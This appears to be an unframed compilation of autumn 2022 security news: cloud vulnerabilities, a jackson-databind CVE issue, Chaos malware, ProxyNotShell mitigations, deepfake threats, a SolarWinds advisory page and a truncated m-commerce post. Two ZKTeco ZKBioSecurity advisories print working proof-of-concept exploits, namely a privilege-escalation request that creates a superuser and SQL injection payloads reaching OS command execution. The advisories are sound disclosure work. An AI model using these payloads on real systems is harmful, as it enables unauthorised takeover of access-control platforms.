By Waqas
After the pandemic hit in 2020 cloud computing gained a lot of adoption, globally. The velocity of cloud…
This is a post from HackRead.com Read the original post: The Top 5 Cloud Vulnerabilities You Should Know Of

After the pandemic hit in 2020 cloud computing gained a lot of adoption, globally. The velocity of cloud adoption has not ceased since. If anything, it has accelerated. New technologies bring with them new challenges, and with cloud computing, cyber security challenges are at the top of the list.

From expanded attack surfaces to multiple new account management strategies, many organizations have addressed these challenges by partnering with cyber security specialists that focus on attack surface management and vulnerability scanning. Being proactive and remediating vulnerabilities before they result in breaches.

Organizations have found that moving to an innovative, cost-effective platform allows them to remain competitive in their market. While migration to the cloud has many benefits, organizations need to be aware of the most common security vulnerabilities they might encounter.

**Security Vulnerabilities of Cloud Environments**

In an ideal world, organizations would be able to do business with limited to no risk. This is unfortunately not the case. Every business decision has some level of risk associated with it, and cloud technology is no different.

**Potential for Data Loss**

Among the security vulnerabilities associated with cloud technologies is the potential for data loss is the most common. This can also be defined as data seepage. Data loss is characterized as a phenomenon where data is purged, loses integrity, or is modified to such an extent that it becomes unintelligible to users or systems.

Data loss in the cloud can occur when a threat actor gains control of data or data-processing systems. Another way this might happen is when apps that process such data are not thoroughly tested, and flaws cause cloud data degradation.

**API Vulnerabilities**

Another common risk to cloud environments is the use of insecure APIs. Since cloud environments are completely reliant on the internet interfaces such as APIs provide external users and systems access to your cloud environment. Insecure APIs provide threat actors with a convenient interface to compromise cloud ecosystems.

APIs must meet the following criteria: They need to support strong authentication processes coupled with industry-standard data encryption. It is also critical that APIs have the capability to monitor and log transactions and callbacks. Being security conscious during the implementation of these components can greatly aid organizations to address this vulnerability.

**Cloud Attack Surface**

The cloud attack surface is an old but big problem. Organizations should also take great care that their cloud assets are not excluded from the scope of their cyber security attack surface. Care should therefore be taken to include all cloud environments in attack surface monitoring solutions. Having clear visibility of the entire cloud ecosystem will address this vulnerability. 

**Cloud Account Management**

We cannot cover cloud security vulnerabilities and not mention user and service account vulnerabilities. The online nature of cloud ecosystems means that they are inevitably exposed to the internet to facilitate access to clients or their systems. Because of this, it is crucial, that user account management needs to be a high priority for organizations.

Threat actors that gain unauthorized access can cause devastating damage to the organization. Organizations need to implement zero-trust and least privilege practices to protect themselves against attackers moving between clouds.

**Compliance Concerns**

Finally, each organization has the responsibility to maintain regulatory compliance by keeping the information of its clients confidential. Because cloud services often allow for significantly bigger data access, businesses must ensure that sufficient access controls and security levels are in place to keep personally identifiable information safe, even if it requires the masking of information

. It is crucial, that only role players who need access to sensitive data, would be granted access to it. Unintentional exposure to personal data, whether to internal role players or threat actors could result in serious litigation against the organization. 

**To Summarize**

Being proactive by scanning their cloud environment for possible vulnerabilities is the best way to address vulnerabilities before they result in breaches. Having clear visibility across the organization’s entire attack surface will allow an organization to keep an eye on its cloud environments.

Understanding the risks and vulnerabilities of cloud computing is essential for effectively safeguarding your organization from both internal and external threat actors. Cloud environments become increasingly complex as organizations become increasingly dependent on specialist knowledge, industry experience, and real-time monitoring.

1.  Explaining Cloud Native Application Security
2.  Cloud security is an ongoing struggle – Is it getting any easier?
3.  Oracle Patches “AttachMe” Vulnerability in Cloud Infrastructure
4.  New CoinStomp cryptomining malware targeting cloud services
5.  Secure Email Gateway Vs. Integrated Cloud Email Security (SEG Vs. ICES)

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

The Top 5 Cloud Vulnerabilities You Should Know Of

In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Labels

2.14

Issues possibly planned for 2.14

has-failing-test

Indicates that there exists a test case (under \`failing/\`) to reproduce the issue

**Comments**

(note: found by oss-fuzz, see: https://bugs.chromium.org/p/oss-fuzz/issues)

Currently feature DeserializationFeature.UNWRAP_SINGLE_VALUE_ARRAYS is supported by most types, and deserializers tend to implement support using recursion, effectively allowing multiple nested layers of JSON Arrays to be unwrapped.  
This is not a feature to support but just an implementation detail; ideally we should only allow a single JSON Array to wrap a value.

I think I have removed ability for deeper nesting from some other types so there may be some prior art.

 cowtowncoder added to-evaluate

Issue that has been received but not yet evaluated

2.14

Issues possibly planned for 2.14

and removed to-evaluate

Issue that has been received but not yet evaluated

labels

Aug 24, 2022

 cowtowncoder changed the title Add check in BeanDeserializer._deserializeFromArray() to try to prevent use of deeply nested arrays Add check in BeanDeserializer._deserializeFromArray() to prevent use of deeply nested arrays

Aug 24, 2022

Hello dear @cowtowncoder,

I am Henry from Code Intelligence. First of all thank you for your quick fixes of this issue!

https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490

Is this issue regarded as a security issue? If yes, we are thinking about applying CVE for it, so the community knows about it and will update to the latest version of jackson-databind.

Thank you for your fixes and support for OSS-Fuzz!

Best regards,  
Henry

@henryrneh I think it is reasonable to file a CVE for this, although one caveat is that it is only applicable if users enable specific DeserializationFeature and not with vanilla (default) setting of ObjectMapper. So that should probably at least be reflect in applicability -- I do not have any statistics of how common enabling this feature is but it probably is minority of usage.

@cowtowncoder thanks for your reply and info! We will communicate the information and handle the application to Google. Many thanks!

I already canceled the application. We will do our best to try not to apply CVEs for fuzz targets written by AdaLogics, however we will need some assitance or notification by you to know who wrote which fuzz target, because OSS-Fuzz is not designed to support this, maybe you can use some special prefix in the fuzz target name so it's more obvious for us so we can filter it out?

> We will do our best to try not to apply CVEs for fuzz targets written by AdaLogics

Great, thanks!

> we will need some assitance or notification by you to know who wrote which fuzz target

Do the links I provided above suffice?

Thank you that works! In the future when AdaLogics add a new fuzz target please let us know or add some prefix to the name, so this will not happen again

> Thank you that works! In the future when AdaLogics add a new fuzz target please let us know or add some prefix to the name, so this will not happen again

sounds good -- I'll also send over an email after the assessment so you can see details about the findings we got using Jazzer

Labels

2.14

Issues possibly planned for 2.14

has-failing-test

Indicates that there exists a test case (under \`failing/\`) to reproduce the issue

CVE-2022-42004: Add check in `BeanDeserializer._deserializeFromArray()` to prevent use of deeply nested arrays · Issue #3582 · FasterXML/jackson-databind

By Deeba Ahmed
Most devices infected by Chaos malware are located in Europe, particularly Italy but infections were also observed in Asia Pacific, South America, and North America.
This is a post from HackRead.com Read the original post: New DDoS Malware ‘Chaos’ Hits Linux and Windows Devices

Researchers at Black Lotus Labs, security firm Lumen Technologies’ research unit, have identified a novel cross-platform malware. Dubbed Chaos by researchers, this malware has infected numerous Windows and Linux devices, including enterprise servers, FreeBSD boxes, and small office routers.

**Researchers Discovered ‘Chaos’**

Lumen’s researchers have dubbed the malware Chaos because this word repeatedly appears in file names, function names, and certificates that the malware uses. The malware is written in Chinese and uses a China-based command and control infrastructure.

The malware was first detected on 16 April after its first control servers cluster went live in the wild. Between June and mid-July, hundreds of unique IP addresses were detected that represented devices infected with Chaos.

In recent months, the infection rate has intensified, with the number of compromised devices increasing from 39 in May to 93 in August and 111 in September. They analyzed around 100 samples of Chaos malware.

**Chaos- a Multifunctional Malware**

Black Lotus Labs researchers wrote that Chaos is a Go-based, multifunctional malware that targets devices based on multiple platforms such as Windows and Linux.

In their report, researchers noted that the malware’s potency is because of several factors, such as its capability to work across multiple architectures, including MIPS, ARM, PowerPC, and Intel (i386), apart from its effects on the two operating systems. This malware supports 70 different commands.

> “Chaos functionlity includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through stealing and brute forcing SSH private keys, as well as launch DDoS attacks.”
> 
> Black Lotus Labs

**Chaos and Kaiji IoT Malware Comparison**

Moreover, Chaos malware is different from ransomware-delivering botnets such as Emotet, which use spamming to be distributed because it spreads through brute force, CVEs, and stolen SSH keys.

The researchers further observed that Chaos’s code base and functional overlapping make it similar to Kaiji IoT malware known for compromising Linux devices for DDoS attacks.

After enumerating the C2 servers of Chaos malware and multiple clusters, researchers identified that some were used in recent DDoS attacks against technology, financial services, gaming, entertainment, and media sector firms.

Researchers concluded that although the botnet infrastructure is relatively small compared to some mainstream DDoS malware families, Chaos is quickly growing. They further added that given its design and novelty, it seems like the work of a ‘cybercriminal actor that is cultivating a network of infected devices to leverage for initial access, DDoS attacks, and crypto mining.’

**Location**

Most bots are located in Europe, particularly Italy but infections were also observed in Asia Pacific, South America, and North America. In some samples, researchers noticed that attackers exploited the CVE-2017-17215 and CVE-2022-30525 vulnerabilities, which impacted Zyxel and Huawei devices.

1.  Old crypto malware hits Windows, and Linux devices
2.  Sysrv-k Botnet Hits Windows and Linux with Cryptominer
3.  SysJoker backdoor Hits Windows, macOS & Linux Devices
4.  ElectroRat crypto malware hits macOS, Windows, Linux devices
5.  Sonic signals can be used to crash Windows, Linux & hard drives

New DDoS Malware ‘Chaos’ Hits Linux and Windows Devices

ZKSecurity BIO version 3.0.5.0_R suffers from a privilege escalation vulnerability.

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and  
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,  
ZKBioSecurity provides a comprehensive web-based security platform. It  
contains multiple integrated modules: personnel, time & attendance, access  
control, visitor management, offline & online consumption management, guard  
patrol, parking, elevator control, entrance control, Facekiosk, intelligent  
video management, mask and temperature detection module, and other smart  
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's  
permissions correctly. An attacker with "Person Self-Login" or "User"  
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101  
Firefox/102.0

Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;  
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base_index.action

Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE>

Upgrade-Insecure-Requests: 1

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"

test_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"

add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"

1657813612925_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"

base

-----------------------------291763244192371568695079347--

#######################END#######################

ZKSecurity BIO 3.0.5.0_R Privilege Escalation

ZKSecurity BIO version 4.1.2 suffers from a remote SQL injection vulnerability that can allow for remote code execution.

    #######################ADVISORY INFORMATION#######################Product: ZKSecurity BIOVendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)Version Affected: 4.1.2CVE: CVE-2022-36635Vulnerability: SQL Injection (with a plus: RCE)#######################CREDIT#######################This vulnerability was discovered and researched by Caio Burgardt andSilton Santos.#######################INTRODUCTION#######################Based on the hybrid biometric technology and computer vision technology,ZKBioSecurity provides a comprehensive web-based security platform. Itcontains multiple integrated modules: personnel, time & attendance, accesscontrol, visitor management, offline & online consumption management, guardpatrol, parking, elevator control, entrance control, Facekiosk, intelligentvideo management, mask and temperature detection module, and other smartsub-systems.#######################VULNERABILITY DETAILS#######################The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQLquery, with only a sanitization filter in front of it. Using comments(/**/) in place of spaces was enough to confuse and bypass the filter.#######################PROOF OF CONCEPT#######################Note that the request delayed 10s:POST /baseOpLog.do HTTP/1.1Host: {HOST}Content-Type: application/x-www-form-urlencodedCookie: SESSION={COOKIE}; menuType=icon-onlyContent-Length: 208list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50if you use the next query, you can execute remote command:list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='#######################END#######################

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

Plus: CIA failures allegedly got US informants killed, a former NSA worker is charged under the Espionage Act, and more.

There were global ripples in tech policy this week as VPN providers were forced to pull out of India as the country’s new data collection law takes hold, and UN countries prepare to elect a new head of the International Telecommunications Union—a key internet standards body.

After explosions and damage to the Nord Stream gas pipeline that runs between Russia and Germany, the destruction is being investigated as deliberate, and a complicated hunt is on to identify the perpetrator. And still-unidentified hackers are “hyperjacking” victims to grab data using a long-feared technique for hijacking virtualization software.

The notorious Lapsus$ hackers have been back on their hacking joyride, compromising massive companies around the world and delivering a dire but important warning about how vulnerable large institutions really are to compromise. And the end-to-end-encrypted communication protocol Matrix patched serious and concerning vulnerabilities this week.

Pornhub debuted a trial of an automated tool that pushes users searching for child sexual abuse material to seek help for their behavior. And Cloudflare rolled out a free Captcha alternative in an attempt to validate humanness online without the headache of finding bicycles in a grid or deciphering blurry text.

We’ve got advice on how to stand up to Big Tech and advocate for data privacy and users' rights in your community, plus tips on the latest iOS, Chrome, and HP updates you need to install.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

On Thursday night, Microsoft confirmed that two unpatched Exchange Server vulnerabilities are actively being exploited by cybercriminals. The vulnerabilities were discovered by a Vietnamese cybersecurity company named GTSC, which claims in a post on its website that the two zero-days have been used in attacks against its customers since early August. While the flaws only impact on-premise Exchange Servers that an attacker has authenticated access to, according to GTSC, the zero-days can be chained together to create backdoors into the vulnerable server. “The vulnerability turns out to be so critical that it allows the attacker to do RCE \[remote code execution\] on the compromised system,” the researchers said.

In a blog post, Microsoft described the first flaw as a server-side request forgery (SSRF) vulnerability, and the second as “an attack that allows remote code execution on a vulnerable server when PowerShell is accessible to the attacker.” The post also provides guidance for how on-premises Microsoft Exchange customers should mitigate the attack.

Sloppy dev-ops and CIA negligence partially enabled Iranian intelligence to identify and capture informants who risked their lives to provide the United States with information, according Reuters. The year-long investigation follows the story of six Iranian men who were jailed as part of an aggressive counterintelligence operation by Iran that began in 2009. The men were partially outed by what Reuters describes as a flawed web-based covert communications system that led to the arrest and execution of dozens of CIA informants in Iran and China. In 2018, Yahoo News reported on the system.

Because the CIA appeared to have purchased web-hosting space in bulk from the same provider, Reuters was able to enumerate hundreds of secret CIA websites meant to facilitate communications between informants around the world and their CIA handlers. The sites, which are no longer active, were devoted to topics such as beauty, fitness, and entertainment. Among them, according to Reuters, was a _Star Wars_ fan page. Two former CIA officials told the news agency that each fake website was assigned to only one spy in order to limit exposure of the entire network in case any single agent was captured.

James Olson, a former chief of CIA counterintelligence, told Reuters, “If we’re careless, if we’re reckless, and we’ve been penetrated, then shame on us.”

On Wednesday, a former National Security Agency staffer was charged with three violations of the Espionage Act for allegedly attempting to sell classified national defense information to an unnamed foreign government, according to court documents unsealed this week. In a press release about the arrest, the US Department of Justice stated that Jareh Sebastian Dalke, of Colorado Springs, Colorado, used an encrypted email to send excerpts of three classified documents to an undercover FBI agent, who he believed to be working with a foreign government. Dalke allegedly told the agent that he was in serious financial debt and, in exchange for the information, needed compensation in cryptocurrency.

The FBI arrested Dalke on Wednesday when he arrived at Union Station in downtown Denver to deliver classified documents to the undercover agent. If convicted, he could face up to life in prison or the death penalty.

On Tuesday, hackers hijacked _Fast Company_’s content management system, blasting two obscene push notifications to the publication’s Apple News followers. In response, the publication’s parent company, Mansueto Ventures, shut down Fastcompany.com and Inc.com, which it also owns. _Fast Company_ issued a statement calling the messages “vile” and “not in line with the content and ethos” of the outlet. An article the hacker apparently posted to _Fast Company_’s website claimed they got access through a password that was shared across many accounts, including an administrator.

As of yesterday, the company’s websites were still offline, instead redirecting to a statement about the hack.

Microsoft Exchange Server Has a Zero-Day Problem

Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the two newly disclosed zero-day flaws in a limited set of attacks aimed at less than 10 organizations globally.
"These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory

Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the two newly disclosed zero-day flaws in a limited set of attacks aimed at less than 10 organizations globally.

"These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration," the Microsoft Threat Intelligence Center (MSTIC) said in a Friday report.

The weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the "highly privileged access Exchange systems confer onto an attacker."

The tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative disclosed the flaws to Microsoft Security Response Center (MSRC) earlier this month on September 8-9, 2022.

The two vulnerabilities have been collectively dubbed **ProxyNotShell**, owing to the fact that "it is the same path and SSRF/RCE pair" as ProxyShell but with authentication, suggesting an incomplete patch.

The issues, which are strung together to achieve remote code execution, are listed below -

*   **CVE-2022-41040** - Microsoft Exchange Server Server-Side Request Forgery Vulnerability
*   **CVE-2022-41082** - Microsoft Exchange Server Remote Code Execution Vulnerability

"While these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user," Microsoft said. "Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy."

The vulnerabilities were first discovered by Vietnamese cybersecurity company GTSC as part of its incident response efforts for a customer in August 2022. A Chinese threat actor is suspected to be behind the intrusions.

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the two Microsoft Exchange Server zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the patches by October 21, 2022.

Microsoft said that it's working on an "accelerated timeline" to release a fix for the shortcomings. It has also published a script for the following URL Rewrite mitigation steps that it said is "successful in breaking current attack chains" -

*   Open IIS Manager
*   Select Default Web Site
*   In the Feature View, click URL Rewrite
*   In the Actions pane on the right-hand side, click Add Rule(s)…
*   Select Request Blocking and click OK
*   Add the string ".\*autodiscover\\.json.\*\\@.\*Powershell.\*" (excluding quotes)
*   Select Regular Expression under Using
*   Select Abort Request under How to block and then click OK
*   Expand the rule and select the rule with the pattern .\*autodiscover\\.json.\*\\@.\*Powershell.\* and click Edit under Conditions.
*   Change the Condition input from {URL} to {REQUEST\_URI}

As additional prevention measures, the company is urging companies to enforce multi-factor authentication (MFA), disable legacy authentication, and educate users about not accepting unexpected two-factor authentication (2FA) prompts.

"Microsoft Exchange is a juicy target for threat actors to exploit for two primary reasons," Travis Smith, vice president of malware threat research at Qualys, told The Hacker News.

"First, Exchange \[...\] being directly connected to the internet creates an attack surface which is accessible from anywhere in the world, drastically increasing its risk of being attacked. Secondly, Exchange is a mission critical function -- organizations can't just unplug or turn off email without severely impacting their business in a negative way."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations

It's time to dispel notions of deepfakes as an emergent threat. All the pieces for widespread attacks are in place and readily available to cybercriminals, even unsophisticated ones.

Malicious campaigns involving the use of deepfake technologies are a lot closer than many might assume. Furthermore, mitigation and detection of them are hard.

A new study of the use and abuse of deepfakes by cybercriminals shows that all the needed elements for widespread use of the technology are in place and readily available in underground markets and open forums. The study by Trend Micro shows that many deepfake-enabled phishing, business email compromise (BEC), and promotional scams are already happening and are quickly reshaping the threat landscape.

**No Longer a Hypothetical Threat**

"From hypothetical and proof-of-concept threats, \[deepfake-enabled attacks\] have moved to the stage where non-mature criminals are capable of using such technologies," says Vladimir Kropotov, security researcher with Trend Micro and the main author of a report on the topic that the security vendor released this week. 

'We already see how deepfakes are integrated into attacks against financial institutions, scams, and attempts to impersonate politicians," he says, adding that what's scary is that many of these attacks use identities of real people — often scraped from content they post on social media networks.

One of the main takeaways from Trend Micro's study is the ready availability of tools, images, and videos for generating deepfakes. The security vendor found, for example, that multiple forums, including GitHub, offer source code for developing deepfakes to anyone who wants it. Similarly, enough high-quality images and videos of ordinary individuals and public figures are available for bad actors to be able to create millions of fake identities or to impersonate politicians, business leaders, and other famous personalities.

Demand for deepfake services and people with expertise on the topic is also growing in underground forums. Trend Micro found ads from criminals searching for these skills to carry out cryptocurrency scams and fraud targeting individual financial accounts. 

"Actors can already impersonate and steal the identities of politicians, C-level executives, and celebrities," Trend Micro said in its report. "This could significantly increase the success rate of certain attacks such as financial schemes, short-lived disinformation campaigns, public opinion manipulation, and extortion."

**A Plethora of Risks**

There's a growing risk also of stolen or recreated identities belonging to ordinary people being used to defraud the impersonated victims, or to conduct malicious activities under their identities. 

In many discussion groups, Trend Micro found users actively discussing ways to use deepfakes to bypass banking and other account verification controls — especially those involving video and face-to-face verification methods.

For example, criminals could use a victim's identity and use a deepfake video of them to open bank accounts, which could later be used for money laundering activities. They can similarly hijack accounts, impersonate top-level executives at organizations to initiate fraudulent money transfer or plant fake evidence to extort individuals, Trend Micro said. 

Devices like Amazon's Alexa and the iPhone, which use voice or face recognition, could soon be on the list of target devices for deepfake-based attacks, the security vendor noted.

"Since many companies are still working in remote or mixed mode, there is an increased risk of personnel impersonation in conference calls which can affect internal and external business communications and sensitive business processes and financial flows," Kropotov says.

Trend Micro isn't alone in sounding the alarm on deepfakes. A recent online survey that VMware conducted of 125 cybersecurity and incident response professionals also found that deepfake-enabled threats are not just coming — they are already here. A startling 66% — up 13% from 2021 — of the respondents said they had experienced a security incident involving deepfake use over the past 12 months.

"Examples of deepfake attacks \[already\] witnessed include CEO voice calls to a CFO leading to a wire transfer, as well as employee calls to IT to initiate a password reset," says Rick McElroy, VMware's principal cybersecurity strategist.

**Few Mitigations for Deepfake Attacks & Detection Is Hard**

Generally speaking, these types of attacks can be effective, because no technological fixes are available yet to address the challenge, McElroy says. 

"Given the rising use and sophistication in creating deepfakes, I see this as one of the biggest threats to organizations from a fraud and scam perspective moving forward," he warns. 

The most effective way to mitigate the threat currently is to increase awareness of the problem among finance, executive, and IT teams who are the main targets for these social engineering attacks. 

"Organizations can consider low-tech methods to break the cycle. This can include using a challenge and passphrase amongst executives when wiring money out of an organization or having a two-step and verified approval process," he says.

Gil Dabah, co-founder and CEO of Piaano, also recommends strict access control as a mitigating measure. No user should have access to big chunks of personal data and organizations need to set rate limits as well as anomaly detection, he says.

"Even systems like business intelligence, which require big data analysis, should access only masked data," Dabah notes, adding that no sensitive personal data should be kept in plaintext and data such as PII should be tokenized and protected.

Meanwhile on the detection front, developments in technologies such as AI-based Generative Adversarial Networks (GANs) have made deepfake detection harder. "That means we can't rely on content containing 'artifact' clues that there has been alteration," says Lou Steinberg, co-founder and managing partner at CTM Insights.

To detect manipulated content, organizations need fingerprints or signatures that prove something is unchanged, he adds.

"Even better is to take micro-fingerprints over portions of the content and be able to identify what's changed and what hasn't," he says. "That's very valuable when an image has been edited, but even more so when someone is trying to hide an image from detection."

**Three Broad Threat Categories**

Steinberg says deepfake threats fall into three broad categories. The first is disinformation campaigns mostly involving edits to legitimate content to change the meaning. As an example, Steinberg points to nation-state actors using fake news images and videos on social media or inserting someone into a photo that wasn't present originally — something that is often used for things like implied product endorsements or revenge porn.

Another category involves subtle changes to images, logos, and other content to bypass automated detection tools such as those used to detect knockoff product logos, images used in phishing campaigns or even tools for detecting child pornography.

The third category involves synthetic or composite deepfakes that are derived from a collection of originals to create something completely new, Steinberg says. 

"We started seeing this with audio a few years back, using computer synthesized speech to defeat voiceprints in financial services call centers," he says. "Video is now being used for things like a modern version of business email compromise or to damage a reputation by having someone 'say' something they never said."

Reshaping the Threat Landscape: Deepfake Cyberattacks Are Here

Insufficient sanitization of inputs in QoE application input field could lead to stored and Dom based XSS attack. This issue is fixed and released in SolarWinds Platform (2022.3.0).



*   Observability
    *   Explore the Platform
    *   SolarWinds Observability
    *   Hybrid Cloud Observability
    *   or View All Observability Products
*   Network Management
    *   Hybrid Cloud Observability
    *   Network Configuration Manager
    *   Kiwi Syslog Server
    *   Network Performance Monitor
    *   Netflow Traffic Analyzer
    *   Network Topology Manager
    *   or View All Network Management Products
*   Systems Management
    *   Hybrid Cloud Observability
    *   Virtualization Manager
    *   Web Performance Monitor
    *   Server & Application Monitor
    *   Storage Resource Monitor
    *   Server Configuration Monitor
    *   or View All Systems Management Products
*   Database Management
    *   Database Performance Analyzer
    *   SQL Sentry
    *   Database Insights for SQL Server
    *   Database Performance Monitor
    *   Task Factory
    *   or View All Database Management Products
*   IT Service Management
    *   Service Desk
    *   Web Help Desk
    *   Explore Dameware
    *   Dameware Remote Everywhere
    *   Dameware Remote Support
    *   or View All IT Service Management Products
*   Application Management
    *   SolarWinds Observability
    *   AppOptics
    *   Server & Application Monitor
    *   Pingdom
    *   Loggly
    *   Web Performance Monitor
    *   or View All Application Management Products
*   IT Security
    *   Access Rights Manager
    *   Patch Manager
    *   Serv-U Secured FTP
    *   Server Event Manager
    *   Identity Monitor
    *   Serv-U Managed File Transfer
    *   or View All IT Security Products
*   or View All Products & Free Trials

The SolarWinds Platform is the industry’s only unified monitoring, observability, and service management platform. It’s the foundation for a new generation of SolarWinds observability solutions and provides the architecture on how we solve observability challenges for our customers.

Top Products

*   Explore the Platform
*   SolarWinds Observability

*   Hybrid Cloud Observability

View All Observability Products

Network management tools, from configuration and traffic intelligence to performance monitoring and topology mapping, to readily see, understand, and resolve issues. An integrated, multi-vendor approach that’s easy to use, extend, and scale to keep distributed networks optimized.

Top Products

*   Hybrid Cloud Observability
*   Network Configuration Manager
*   Kiwi Syslog Server

*   Network Performance Monitor
*   Netflow Traffic Analyzer
*   Network Topology Manager

View All Network Management Products

Comprehensive server and application management that’s simple, interoperable, and customizable from systems, IPs, and VMs to containers and services. Optimize resource usage and reduce MTTR with powerful monitoring, discovery, dependency mapping, alerting, reporting, and capacity planning.

Top Products

*   Hybrid Cloud Observability
*   Virtualization Manager
*   Web Performance Monitor

*   Server & Application Monitor
*   Storage Resource Monitor
*   Server Configuration Monitor

View All Systems Management Products

Monitor, analyze, diagnose, and optimize database performance and data ops that drive your business-critical applications. Unify on-premises and cloud database visibility, control, and management with streamlined monitoring, mapping, data lineage, data integration, and tuning across multiple vendors.

Top Products

*   Database Performance Analyzer
*   SQL Sentry
*   Database Insights for SQL Server

*   Database Performance Monitor
*   Task Factory

View All Database Management Products

Modernize your service desk with intelligent and automated ticketing, asset, configuration, and service-level agreement (SLA) management; a knowledge base; and a self-service portal with secure remote assistance. SolarWinds offers an easy-to-use IT service management (ITSM) platform designed to meet your service management needs to maximize productivity while adhering to ITIL best practices.

Top Products

*   Service Desk
*   Web Help Desk
*   Explore Dameware

*   Dameware Remote Everywhere
*   Dameware Remote Support

View All IT Service Management Products

Ensure user experience with unified performance monitoring, tracing, and metrics across applications, clouds, and SaaS. Robust solutions offering rich visualization, synthetic and real user monitoring (RUM), and extensive log management, alerting, and analytics to expedite troubleshooting and reporting.

Top Products

*   SolarWinds Observability
*   AppOptics
*   Server & Application Monitor

*   Pingdom
*   Loggly
*   Web Performance Monitor

View All Application Management Products

Reduce attack surface, manage access, and improve compliance with IT security solutions designed for accelerated time-to-value ranging from security event management, access rights management, identity monitoring, server configuration monitoring and patching, and secure gateway and file transfer.

Top Products

*   Access Rights Manager
*   Patch Manager
*   Serv-U Secured FTP

*   Security Event Manager
*   Identity Monitor
*   Serv-U Managed File Transfer

View All IT Security Products

CVE-2022-36965: SolarWinds Trust Center Security Advisories | CVE-2022-36965

By Owais Sultan
Due to its many benefits, mobile commerce has been growing quickly over the last several years. The need…
This is a post from HackRead.com Read the original post: Top 5 Mobile Commerce Trends in 2022

Due to its many benefits, mobile commerce has been growing quickly over the last several years. The need for mobile app development and mobile commerce is growing daily. Mobile commerce may provide you with many options to succeed in the internet market if you are an online vendor.

However, there are currently a number of significant m-commerce competitors on the market, so it’s important to remain up to date on these developments if you want to stay ahead of the pack.

**What Exactly is M-commerce?**

Mobile commerce is the act of buying and selling products and services using portable electronics like smartphones and tablets. Mobile devices with shopping applications, social media channels, and online browsers are used for all commercial transactions.

